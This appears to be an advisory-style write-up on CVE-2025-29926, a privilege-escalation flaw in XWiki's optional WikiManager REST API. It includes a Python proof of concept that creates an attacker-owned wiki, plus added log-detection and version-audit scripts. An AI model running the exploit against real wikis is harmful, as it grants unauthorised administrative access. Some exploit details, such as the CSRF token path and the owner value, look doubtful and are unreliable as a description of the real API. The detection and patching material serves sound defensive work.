The XWiki Platform is a popular and widely used open-source wiki application, known for its extensible architecture and for supporting custom applications written in wiki syntax. A recently disclosed vulnerability (CVE-2025-29926) allows an attacker to create a new wiki through the WikiManager REST API, which effectively grants them administrative access to that wiki. That administrative access can then be leveraged to launch further attacks on the wiki infrastructure. The vulnerability affects versions of XWiki Platform prior to 15.10.15, 16.4.6, and 16.10. Notably, this REST API is not bundled with XWiki Standard by default; it has to be installed manually through the extension manager.
Exploit Details
The WikiManager REST API is an optional component of the XWiki Platform that provides advanced wiki management functionality. It was found that any user could use this API to create a new wiki and thereby become an administrator of that wiki. This gives the attacker elevated privileges and the ability to perform malicious activities on the newly created wiki, which could in turn lead to compromise of other wikis hosted on the same platform.
The following code snippet demonstrates how an attacker could exploit this vulnerability to create a new wiki via the WikiManager REST API:
```python
import requests

WIKI_URL = "https://your-xwiki-platform-url.com"
USERNAME = "attacker"
PASSWORD = "password"

# Log in to the XWiki Platform through the form-based login endpoint
auth_payload = {
    "j_username": USERNAME,
    "j_password": PASSWORD,
}
login_response = requests.post(f"{WIKI_URL}/j_security_check",
                               data=auth_payload,
                               allow_redirects=False)

# A successful form login answers with a redirect (302)
if login_response.status_code != 302:
    raise Exception("Login Failed")

# Prepare headers and CSRF token for the WikiManager REST API call
headers = {
    "Cookie": login_response.headers["Set-Cookie"],
    "X-Requested-With": "XMLHttpRequest",
}
csrf_token_query = requests.get(f"{WIKI_URL}/csrf/1./token", headers=headers)
csrf_token = csrf_token_query.text

# Payload for the new wiki, with the attacker's account set as its owner
create_wiki_payload = {
    "name": "malicious_wiki",
    "pretty_name": "Malicious Wiki",
    "owner": f"{USERNAME}_1",
    "description": "A wiki created through the exploit",
}
response = requests.post(f"{WIKI_URL}/rest/wikis",
                         headers=headers,
                         params={"form_token": csrf_token},
                         json=create_wiki_payload)

# The REST API answers 201 Created when the wiki has been created
if response.status_code != 201:
    raise Exception("Unexpected status code when creating wiki")
```
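From the defender's side, the call above leaves a clear trace: a POST to the wiki-creation endpoint under /rest/wikis in the web server's access log. The following Python is an added detection example, not part of the original post and not XWiki's own code. It assumes access logs in Common Log Format with the authenticated XWiki account in the authuser field, and an allowlist of accounts that are expected to create wikis; the sample log lines are constructed for the example.

```python
import re

# Constructed sample access log lines in Common Log Format (not real traffic).
# The authuser field carries the XWiki account the request was authenticated as.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - alice [19/Mar/2025:18:20:01 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120
10.0.0.9 - bob [19/Mar/2025:18:21:14 +0000] "POST /xwiki/rest/wikis HTTP/1.1" 201 312
10.0.0.2 - admin [19/Mar/2025:18:22:30 +0000] "POST /xwiki/rest/wikis HTTP/1.1" 201 298
10.0.0.9 - bob [19/Mar/2025:18:23:02 +0000] "GET /xwiki/rest/wikis HTTP/1.1" 200 1204
10.0.0.7 - - [19/Mar/2025:18:24:45 +0000] "POST /xwiki/rest/wikis HTTP/1.1" 401 0
"""

# Common Log Format: host, ident, authuser, [timestamp], "request line", status, bytes
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Wiki creation goes through POST .../rest/wikis; the servlet context path
# (/xwiki in the sample) differs between deployments, so only the suffix is matched.
WIKI_CREATE_PATH = re.compile(r"/rest/wikis/?$")


def parse_clf(line):
    """Parse one CLF line into a dict, or return None for lines that do not match."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_wiki_creations(lines, expected_admins):
    """Return every wiki-creation call, flagging successful ones by unexpected users."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not WIKI_CREATE_PATH.search(rec["path"]):
            continue
        succeeded = 200 <= rec["status"] < 300
        findings.append({
            "ts": rec["ts"],
            "ip": rec["ip"],
            "user": rec["user"],
            "status": rec["status"],
            "succeeded": succeeded,
            # A wiki created by an account outside the expected admin set is the
            # signal for CVE-2025-29926 abuse; failed attempts are kept for context.
            "suspicious": succeeded and rec["user"] not in expected_admins,
        })
    return findings


if __name__ == "__main__":
    for f in find_wiki_creations(SAMPLE_ACCESS_LOG.splitlines(), {"admin"}):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f'{f["ts"]} {f["ip"]:10} {f["user"]:8} POST /rest/wikis -> {f["status"]} {flag}')
```

Run against the sample, the creation by bob is flagged while the one by admin is not, and the unauthenticated 401 attempt is listed only for context. In a real deployment, feed it the reverse proxy or servlet container access log and replace the allowlist with the accounts that legitimately administer the farm.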
The developers of XWiki have released a security patch addressing this issue in versions 15.10.15, 16.4.6, and 16.10. of the REST module.
To protect your XWiki installation, upgrade to the latest version of XWiki Platform, which includes the patched REST module. Users running an affected version can also download the patched REST module from the XWiki Extension Repository.
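To check an inventory of XWiki instances against the fixed versions listed above, the following Python is an added helper, not taken from the original page or from the XWiki project. It assumes the advisory's three fixed versions apply to the 15.10.x, 16.4.x and 16.10.x branches respectively; the exact 16.10.x patch level is truncated on the page, so a labelled placeholder is used there. Pre-release tags such as -rc-1 are treated as older than the final release they precede.

```python
import re

# Fixed versions per release branch, as stated in the advisory above.
# The 16.10.x patch level is truncated on the page, so a PLACEHOLDER is assumed.
FIXED_VERSIONS = {
    (15, 10): (15, 10, 15),
    (16, 4): (16, 4, 6),
    (16, 10): (16, 10, 0),  # PLACEHOLDER patch level, not taken from the page
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(-.+)?$")


def parse_version(text):
    """Turn '16.4.6' or '16.10.0-rc-1' into a comparable tuple.

    The last element is 1 for a final release and 0 for a pre-release
    (-rc-N, -milestone-N), so a pre-release sorts below the release it precedes.
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version string: {text!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if suffix else 1)


def is_affected(text):
    """True when the version predates the fix that applies to its branch."""
    v = parse_version(text)
    branch = v[:2]
    # The relevant fix is the lowest fixed version on this branch or a later one;
    # a version newer than every fixed branch already carries the fix.
    later_branches = sorted(b for b in FIXED_VERSIONS if b >= branch)
    if not later_branches:
        return False
    fix = FIXED_VERSIONS[later_branches[0]] + (1,)
    return v < fix


def audit(versions):
    """Map each version string to 'affected' or 'fixed' for a quick inventory."""
    return {v: ("affected" if is_affected(v) else "fixed") for v in versions}


if __name__ == "__main__":
    sample = ["15.10.14", "15.10.15", "16.4.6-rc-1", "16.5.0", "16.11.0"]
    for version, state in audit(sample).items():
        print(f"{version:14} {state}")
```

The version check is only half the picture: because the WikiManager REST API is an optional extension, an instance on an affected platform version that never installed the extension does not expose the endpoint, while an instance that did needs the patched REST module regardless of what the core version says.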
References
1. XWiki Platform Official Website
2. CVE-2025-29926 NVD Entry
3. XWiki Security Advisory
4. XWiki Extensions Repository
Timeline
Published on: 03/19/2025 18:15:25 UTC